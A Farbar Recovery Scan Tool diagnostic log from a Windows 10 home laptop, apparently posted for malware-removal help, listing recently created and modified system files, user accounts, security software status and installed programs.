2016-03-01 12:57 - 2016-02-23 02:09 - 00870400 _____ (Microsoft Corporation) C:\WINDOWS\system32\modernexecserver.dll
2016-03-01 12:57 - 2016-02-23 02:06 - 01848832 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMPDMC.exe
2016-03-01 12:57 - 2016-02-23 02:06 - 01213440 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwansvc.dll
2016-03-01 12:57 - 2016-02-23 02:06 - 00065536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininetlui.dll
2016-03-01 12:57 - 2016-02-23 02:06 - 00045568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jsproxy.dll
2016-03-01 12:57 - 2016-02-23 02:05 - 00161280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe
2016-03-01 12:57 - 2016-02-23 02:04 - 01131520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Audio.dll
2016-03-01 12:57 - 2016-02-23 02:04 - 00673792 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll
2016-03-01 12:57 - 2016-02-23 02:04 - 00382464 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
2016-03-01 12:57 - 2016-02-23 02:02 - 01318912 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifinetworkmanager.dll
2016-03-01 12:57 - 2016-02-23 02:02 - 00755712 _____ (Microsoft Corporation) C:\WINDOWS\system32\spoolsv.exe
2016-03-01 12:57 - 2016-02-23 02:02 - 00285696 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb10.sys
2016-03-01 12:57 - 2016-02-23 01:58 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Core.TextInput.dll
2016-03-01 12:57 - 2016-02-23 01:58 - 00163840 _____ (Microsoft Corporation) C:\WINDOWS\system32\TimeBrokerServer.dll
2016-03-01 12:57 - 2016-02-23 01:58 - 00108544 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputLocaleManager.dll
2016-03-01 12:57 - 2016-02-23 01:57 - 00031744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TimeBrokerClient.dll
2016-03-01 12:57 - 2016-02-23 01:54 - 00402432 _____ (Microsoft Corporation) C:\WINDOWS\system32\sharemediacpl.dll
2016-03-01 12:57 - 2016-02-23 01:52 - 00456704 _____ (Microsoft Corporation) C:\WINDOWS\system32\ipnathlp.dll
2016-03-01 12:57 - 2016-02-23 01:50 - 00266752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSFlacDecoder.dll
2016-03-01 12:57 - 2016-02-23 01:49 - 00200704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DisplayManager.dll
2016-03-01 12:57 - 2016-02-23 01:48 - 00838144 _____ (Microsoft Corporation) C:\WINDOWS\system32\uDWM.dll
2016-03-01 12:57 - 2016-02-23 01:47 - 01490432 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataService.dll
2016-03-01 12:57 - 2016-02-23 01:47 - 00157184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WiFiDisplay.dll
2016-03-01 12:57 - 2016-02-23 01:41 - 03594240 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2016-03-01 12:57 - 2016-02-23 01:38 - 00480256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MCRecvSrc.dll
2016-03-01 12:57 - 2016-02-23 01:37 - 01118208 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll
2016-03-01 12:57 - 2016-02-23 01:37 - 00613376 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSync.dll
2016-03-01 12:57 - 2016-02-23 01:37 - 00394752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\werui.dll
2016-03-01 12:57 - 2016-02-23 01:36 - 00713728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netlogon.dll
2016-03-01 12:57 - 2016-02-23 01:36 - 00379392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmkvsrcsnk.dll
2016-03-01 12:57 - 2016-02-23 01:36 - 00250880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.TestingFramework.dll
2016-03-01 12:57 - 2016-02-23 01:35 - 00400896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv
2016-03-01 12:57 - 2016-02-23 01:31 - 00585216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.AccountsControl.dll
2016-03-01 12:57 - 2016-02-23 01:31 - 00228352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\deviceaccess.dll
2016-03-01 12:57 - 2016-02-23 01:30 - 02275840 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2016-03-01 12:57 - 2016-02-23 01:30 - 01832448 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.dll
2016-03-01 12:57 - 2016-02-23 01:30 - 00646656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.dll
2016-03-01 12:57 - 2016-02-23 01:29 - 00949248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Unistore.dll
2016-03-01 12:57 - 2016-02-23 01:29 - 00349696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupShim.dll
2016-03-01 12:57 - 2016-02-23 01:28 - 00555520 _____ (Microsoft Corporation) C:\WINDOWS\system32\SyncController.dll
2016-03-01 12:57 - 2016-02-23 01:28 - 00256512 _____ (Microsoft Corporation) C:\WINDOWS\system32\accountaccessor.dll
2016-03-01 12:57 - 2016-02-23 01:26 - 02158592 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2016-03-01 12:57 - 2016-02-23 01:26 - 01498112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMPDMC.exe
2016-03-01 12:57 - 2016-02-23 01:25 - 01996288 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActiveSyncProvider.dll
2016-03-01 12:57 - 2016-02-23 01:24 - 04827136 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExplorerFrame.dll
2016-03-01 12:57 - 2016-02-23 01:24 - 01105920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Audio.dll
2016-03-01 12:57 - 2016-02-23 01:24 - 00489984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll
2016-03-01 12:57 - 2016-02-23 01:22 - 01944576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputService.dll
2016-03-01 12:57 - 2016-02-23 01:21 - 00245760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TextInputFramework.dll
2016-03-01 12:57 - 2016-02-23 01:21 - 00133632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Core.TextInput.dll
2016-03-01 12:57 - 2016-02-23 01:20 - 00083456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputLocaleManager.dll
2016-03-01 12:57 - 2016-02-23 01:17 - 02635264 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll
2016-03-01 12:57 - 2016-02-23 01:14 - 00990720 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll
2016-03-01 12:57 - 2016-02-23 01:11 - 01390080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Shell.dll
2016-03-01 12:57 - 2016-02-23 01:05 - 00503296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSync.dll
2016-03-01 12:57 - 2016-02-23 01:01 - 02295808 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansvc.dll
2016-03-01 12:57 - 2016-02-23 00:59 - 01500672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2016-03-01 12:57 - 2016-02-23 00:58 - 00450560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SyncController.dll
2016-03-01 12:57 - 2016-02-23 00:56 - 04412928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExplorerFrame.dll
2016-03-01 12:57 - 2016-02-23 00:55 - 04894208 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2016-03-01 12:57 - 2016-02-23 00:55 - 02229760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2016-03-01 12:57 - 2016-02-23 00:55 - 01707520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActiveSyncProvider.dll
2016-03-01 12:57 - 2016-02-23 00:53 - 01799168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Logon.dll
2016-03-01 12:57 - 2016-02-23 00:51 - 00754176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll
2016-03-01 12:57 - 2016-02-23 00:42 - 03425792 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2016-03-01 12:57 - 2016-02-23 00:41 - 02912256 _____ (Microsoft Corporation) C:\WINDOWS\system32\CertEnroll.dll
2016-03-01 12:57 - 2016-02-23 00:36 - 03666432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2016-03-01 12:57 - 2016-02-23 00:35 - 07533568 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll
2016-03-01 12:57 - 2016-02-23 00:33 - 02604032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CertEnroll.dll
2016-03-01 12:57 - 2016-02-23 00:32 - 02793472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
2016-03-01 12:57 - 2016-02-23 00:30 - 02061312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll
2016-03-01 12:57 - 2016-02-23 00:28 - 06740992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll
2016-03-01 12:57 - 2016-02-23 00:26 - 12587520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmp.dll
2016-03-01 12:57 - 2016-02-08 22:28 - 00277856 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sdbus.sys
2016-03-01 12:57 - 2016-02-08 22:13 - 00185184 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dumpsd.sys
2016-03-01 12:57 - 2016-02-08 21:18 - 00297472 _____ (Microsoft Corporation) C:\WINDOWS\system32\thumbcache.dll
2016-03-01 12:57 - 2016-02-08 21:18 - 00237056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\thumbcache.dll
2016-03-01 12:57 - 2016-02-08 21:07 - 01626624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2016-03-01 12:57 - 2016-02-08 21:07 - 00086016 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceEnroller.exe
2016-02-23 13:55 - 2016-02-23 13:55 - 00007238 _____ C:\Users\levilaing\Downloads\ACRB.txt
2016-02-16 17:08 - 2016-02-16 17:08 - 01046528 _____ C:\Users\levilaing\Downloads\MicrosoftFixit50848.msi
2016-02-12 13:50 - 2016-03-09 17:24 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-02-09 13:01 - 2016-01-29 00:57 - 04502352 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2016-02-09 13:01 - 2016-01-29 00:33 - 04064320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2016-02-09 13:01 - 2016-01-27 00:15 - 01557776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2016-02-09 13:01 - 2016-01-27 00:01 - 01997328 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2016-02-09 13:01 - 2016-01-26 23:59 - 00304752 _____ (Microsoft Corporation) C:\WINDOWS\system32\systemreset.exe
2016-02-09 13:01 - 2016-01-26 23:57 - 01824264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2016-02-09 13:01 - 2016-01-26 23:57 - 00820704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll
2016-02-09 13:01 - 2016-01-26 23:55 - 00081112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OpenWith.exe
2016-02-09 13:01 - 2016-01-26 23:54 - 00295264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2016-02-09 13:01 - 2016-01-26 23:46 - 02606824 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2016-02-09 13:01 - 2016-01-26 23:46 - 01270072 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll
2016-02-09 13:01 - 2016-01-26 23:44 - 00604928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2016-02-09 13:01 - 2016-01-26 23:44 - 00085320 _____ (Microsoft Corporation) C:\WINDOWS\system32\OpenWith.exe
2016-02-09 13:01 - 2016-01-26 23:43 - 00359776 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2016-02-09 13:01 - 2016-01-26 23:21 - 00162816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msorcl32.dll
2016-02-09 13:01 - 2016-01-26 23:15 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ztrace_maps.dll
2016-02-09 13:01 - 2016-01-26 23:11 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mtxoci.dll
2016-02-09 13:01 - 2016-01-26 23:10 - 00099840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hlink.dll
2016-02-09 13:01 - 2016-01-26 23:08 - 00299008 _____ (Microsoft Corporation) C:\WINDOWS\system32\microsoft-windows-system-events.dll
2016-02-09 13:01 - 2016-01-26 23:08 - 00036864 _____ (Microsoft Corporation) C:\WINDOWS\system32\ztrace_maps.dll
2016-02-09 13:01 - 2016-01-26 23:07 - 00203264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iassam.dll
2016-02-09 13:01 - 2016-01-26 23:04 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\mtxoci.dll
2016-02-09 13:01 - 2016-01-26 23:02 - 00109056 _____ (Microsoft Corporation) C:\WINDOWS\system32\hlink.dll
2016-02-09 13:01 - 2016-01-26 23:01 - 00792064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2016-02-09 13:01 - 2016-01-26 22:59 - 00258048 _____ (Microsoft Corporation) C:\WINDOWS\system32\iassam.dll
2016-02-09 13:01 - 2016-01-26 22:57 - 00764928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2016-02-09 13:01 - 2016-01-26 22:52 - 00970752 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2016-02-09 13:01 - 2016-01-26 22:50 - 00144384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxdav.sys
2016-02-09 13:01 - 2016-01-26 22:49 - 05662208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2016-02-09 13:01 - 2016-01-26 22:44 - 00063488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cfgbkend.dll
2016-02-09 13:01 - 2016-01-26 22:42 - 01387520 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2016-02-09 13:01 - 2016-01-26 22:38 - 07835648 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2016-02-09 13:01 - 2016-01-26 22:32 - 01087488 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll
2016-02-09 13:01 - 2016-01-26 22:31 - 00079360 _____ (Microsoft Corporation) C:\WINDOWS\system32\cfgbkend.dll

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-03-09 17:47 - 2014-07-07 11:35 - 00002272 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-03-09 17:44 - 2016-01-06 10:04 - 00000000 ____D C:\WINDOWS\System32\Tasks\Norton Security
2016-03-09 17:44 - 2013-09-13 15:32 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2016-03-09 17:38 - 2014-07-07 11:34 - 00000918 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2016-03-09 17:37 - 2015-09-01 10:45 - 00000000 __SHD C:\Users\levilaing\IntelGraphicsProfiles
2016-03-09 17:37 - 2013-12-13 19:44 - 00000000 ____D C:\Users\levilaing\AppData\LocalLow\AuthenTec
2016-03-09 17:35 - 2015-12-19 19:44 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-03-09 17:34 - 2015-10-30 00:28 - 00524288 ___SH C:\WINDOWS\system32\config\BBI
2016-03-09 17:34 - 2014-07-08 15:30 - 00000000 ____D C:\Users\levilaing\AppData\Local\Adobe
2016-03-09 17:31 - 2014-07-07 11:34 - 00000922 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2016-03-09 17:24 - 2015-03-31 19:40 - 00000000 ____D C:\Program Files (x86)\Fitbit Connect
2016-03-09 16:46 - 2015-12-19 19:25 - 00000000 ____D C:\Users\levilaing
2016-03-09 16:46 - 2014-07-07 11:34 - 00000000 ____D C:\Program Files\Google
2016-03-09 16:46 - 2014-07-07 11:34 - 00000000 ____D C:\Program Files (x86)\Google
2016-03-09 16:45 - 2015-09-03 10:03 - 00000000 ____D C:\Users\levilaing\AppData\LocalLow\Temp
2016-03-09 16:36 - 2015-10-30 00:28 - 00008192 ___SH C:\WINDOWS\system32\config\ELAM
2016-03-09 16:26 - 2015-09-01 10:51 - 00002416 _____ C:\Users\levilaing\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2016-03-09 16:26 - 2013-12-13 17:53 - 00000000 __RDO C:\Users\levilaing\SkyDrive
2016-03-09 10:13 - 2015-10-30 01:11 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-03-09 10:07 - 2015-10-30 01:24 - 00000000 ___HD C:\Program Files\WindowsApps
2016-03-09 10:07 - 2015-10-30 01:24 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-03-08 16:57 - 2013-09-13 13:01 - 00000000 ____D C:\Users\levilaing\AppData\Local\Packages
2016-03-08 16:54 - 2014-07-07 11:34 - 00000000 ____D C:\Users\levilaing\AppData\Local\Google
2016-03-08 16:54 - 2014-01-16 14:20 - 00000000 ____D C:\ProgramData\Google
2016-03-08 16:53 - 2012-12-20 18:47 - 00000000 ____D C:\Program Files (x86)\CyberLink
2016-03-08 16:53 - 2012-12-20 18:32 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2016-03-08 16:52 - 2012-12-20 18:46 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Productivity and Tools
2016-03-08 16:51 - 2015-09-28 19:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Canon Utilities
2016-03-08 16:50 - 2015-09-28 19:17 - 00000000 ____D C:\Program Files\Canon
2016-03-08 16:50 - 2014-01-21 17:04 - 00000000 ____D C:\Program Files (x86)\Canon
2016-03-07 17:19 - 2015-10-30 01:24 - 00000000 ____D C:\WINDOWS\rescache
2016-03-01 13:45 - 2015-12-19 19:24 - 00972104 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-03-01 13:45 - 2015-10-30 01:21 - 00000000 ____D C:\WINDOWS\INF
2016-03-01 13:40 - 2012-12-20 19:23 - 00000000 __RHD C:\Users\Public\AccountPictures
2016-03-01 13:37 - 2015-12-19 19:15 - 04967824 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2016-03-01 13:33 - 2015-10-30 03:07 - 00000000 ____D C:\Program Files\Windows Journal
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 __RSD C:\WINDOWS\Media
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 ___RD C:\WINDOWS\PurchaseDialog
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 ____D C:\WINDOWS\system32\SystemResetPlatform
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 ____D C:\WINDOWS\system32\appraiser
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 ____D C:\WINDOWS\bcastdvr
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 ____D C:\Program Files\Windows Portable Devices
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 ____D C:\Program Files\Windows Multimedia Platform
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 ____D C:\Program Files (x86)\Windows Portable Devices
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 ____D C:\Program Files (x86)\Windows Multimedia Platform
2016-03-01 13:33 - 2015-10-30 00:28 - 00000000 ____D C:\WINDOWS\SysWOW64\Dism
2016-03-01 13:33 - 2015-10-30 00:28 - 00000000 ____D C:\WINDOWS\system32\Dism
2016-03-01 13:27 - 2015-12-24 12:27 - 00000000 ____D C:\ProgramData\Norton
2016-03-01 08:26 - 2015-12-07 08:59 - 00002005 _____ C:\Users\levilaing\Desktop\Dashlane.lnk
2016-03-01 08:26 - 2015-12-07 08:58 - 00000000 ____D C:\Users\levilaing\AppData\Roaming\Dashlane
2016-02-29 13:22 - 2013-09-13 13:11 - 00000000 ____D C:\Users\levilaing\AppData\Local\ElevatedDiagnostics
2016-02-23 16:21 - 2015-12-15 14:22 - 00000000 ____D C:\Users\levilaing\Desktop\Tor Browser
2016-02-17 19:42 - 2014-10-21 09:58 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2016-02-17 19:42 - 2013-11-15 12:08 - 00000000 ____D C:\ProgramData\Oracle
2016-02-17 19:42 - 2013-11-15 12:08 - 00000000 ____D C:\Program Files (x86)\Java
2016-02-17 19:41 - 2016-01-05 13:15 - 00000000 ____D C:\Users\levilaing\.oracle_jre_usage
2016-02-17 19:41 - 2014-10-21 09:58 - 00097888 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\WindowsAccessBridge-32.dll
2016-02-17 19:18 - 2016-01-05 13:35 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-02-16 13:23 - 2016-01-05 13:36 - 00000000 ____D C:\Users\levilaing\AppData\Local\CrashDumps
2016-02-12 18:00 - 2013-12-24 11:04 - 00000000 ____D C:\Program Files (x86)\HP SimplePass
2016-02-09 14:04 - 2013-08-22 07:25 - 00000167 _____ C:\WINDOWS\win.ini
2016-02-09 14:03 - 2013-09-16 08:59 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-02-09 13:57 - 2013-09-16 08:59 - 146614896 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2016-02-09 09:02 - 2013-09-16 14:19 - 00000000 ____D C:\Users\levilaing\Documents\Youcam

==================== Files in the root of some directories =======

2015-12-18 17:54 - 2015-12-18 17:54 - 0001035 _____ () C:\Program Files (x86)\suit.log
2014-04-18 15:32 - 2014-04-18 15:32 - 0007168 _____ () C:\Users\levilaing\AppData\Roaming\SQLiteManager3.pref
2014-02-04 20:57 - 2014-02-04 20:57 - 0000045 _____ () C:\Users\levilaing\AppData\Roaming\WB.CFG
2014-05-23 10:53 - 2014-05-23 10:53 - 0002165 _____ () C:\Users\levilaing\AppData\Local\recently-used.xbel

Some files in TEMP:
====================
C:\Users\levilaing\AppData\Local\Temp\sqlite3.dll

==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2016-03-02 03:16

==================== End of FRST.txt ============================

Additional scan result of Farbar Recovery Scan Tool (x64) Version:05-03-2016 01
Ran by levilaing (2016-03-09 17:53:19)
Running from C:\Users\levilaing\Desktop
Windows 10 Home Version 1511 (X64) (2015-12-20 01:54:43)
Boot Mode: Normal
==========================================================

==================== Accounts: =============================

Administrator (S-1-5-21-1018505005-2824899964-3694806622-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-1018505005-2824899964-3694806622-503 - Limited - Disabled)
Guest (S-1-5-21-1018505005-2824899964-3694806622-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1018505005-2824899964-3694806622-1005 - Limited - Enabled)
levilaing (S-1-5-21-1018505005-2824899964-3694806622-1001 - Administrator - Enabled) => C:\Users\levilaing

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Norton Security (Enabled - Up to date) {53C7D717-52E2-B95E-FA61-6F32ECC805DB}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Norton Security (Enabled - Up to date) {E8A636F3-74D8-B6D0-C0D1-5440974F4F66}
FW: Norton Security (Enabled) {6BFC5632-188D-B806-D13E-C607121B42A0}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Flash Player 20 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 20.0.0.306 - Adobe Systems Incorporated)
Adobe Photoshop CS6 (HKLM-x32\...\{74EB3499-8B95-4B5C-96EB-7B342F3FD0C6}) (Version: 13.0 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.0 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.0.5.146 - Adobe Systems, Inc.)
AuthenTec TrueAPI 64-bit (Version: 1.6.0.87 - AuthenTec, Inc.) Hidden
BioExcess (Version: 6.5.5.20 - Egis Technology Inc.) Hidden
Canon IJ Scan Utility (HKLM-x32\...\Canon_IJ_Scan_Utility) (Version: - Canon Inc.)
Canon Inkjet Printer/Scanner/Fax Extended Survey Program (HKLM-x32\...\CANONIJPLM100) (Version: 4.0.0 - Canon Inc.)
Canon MG2500 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MG2500_series) (Version: 1.00 - Canon Inc.)
Canon MG2500 series On-screen Manual (HKLM-x32\...\Canon MG2500 series On-screen Manual) (Version: 7.6.1 - Canon Inc.)
Canon MG2500 series User Registration (HKLM-x32\...\Canon MG2500 series User Registration) (Version: - ‭Canon Inc.)
Canon My Printer (HKLM-x32\...\CanonMyPrinter) (Version: 3.1.0 - Canon Inc.)
Canon Quick Menu (HKLM-x32\...\CanonQuickMenu) (Version: 2.2.1 - Canon Inc.)
CyberLink Power2Go 8 (HKLM-x32\...\InstallShield_{2A87D48D-3FDF-41fd-97CD-A1E370EFFFE2}) (Version: 8.0.3.2527 - CyberLink Corp.)
CyberLink PowerDirector 10 (HKLM-x32\...\InstallShield_{B0B4F6D2-F2AE-451A-9496-6F2F6A897B32}) (Version: 10.0.3.2606 - CyberLink Corp.)
CyberLink PowerDVD (HKLM-x32\...\InstallShield_{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.6.4319 - CyberLink Corp.)
CyberLink YouCam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 3.5.4.5527 - CyberLink Corp.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Dashlane (HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Dashlane) (Version: 4.1.0.99957 - Dashlane SAS)
DVD Flick 1.3.0.7 (HKLM-x32\...\DVD Flick_is1) (Version: 1.3.0.7 - Dennis Meuwissen)
Energy Star (HKLM\...\{0FA995CC-C849-4755-B14B-5404CC75DC24}) (Version: 1.0.8 - Hewlett-Packard)
Fitbit Connect (HKLM-x32\...\{E54705FB-98A6-4C03-B2DC-D8C3B5486DCD}) (Version: 2.0.0.6512 - Fitbit Inc.)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 48.0.2564.116 - Google Inc.)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
HP 3D DriveGuard (HKLM\...\{54CE68A8-4F2D-4328-B1F7-D6C720405F7F}) (Version: 4.2.9.1 - Hewlett-Packard Company)
HP CoolSense (HKLM-x32\...\{59F8C5AA-91BD-423D-BF05-09A80F39898F}) (Version: 2.10.62 - Hewlett-Packard Company)
HP Quick Launch (HKLM-x32\...\{E5823036-6F09-4D0A-B05C-E2BAA129288A}) (Version: 3.0.6 - Hewlett-Packard Company)
HP Registration Service (HKLM\...\{E4D6CCF2-0AAF-4B9C-9DE5-893EDC9B4BAA}) (Version: 1.0.5976.4186 - Hewlett-Packard)
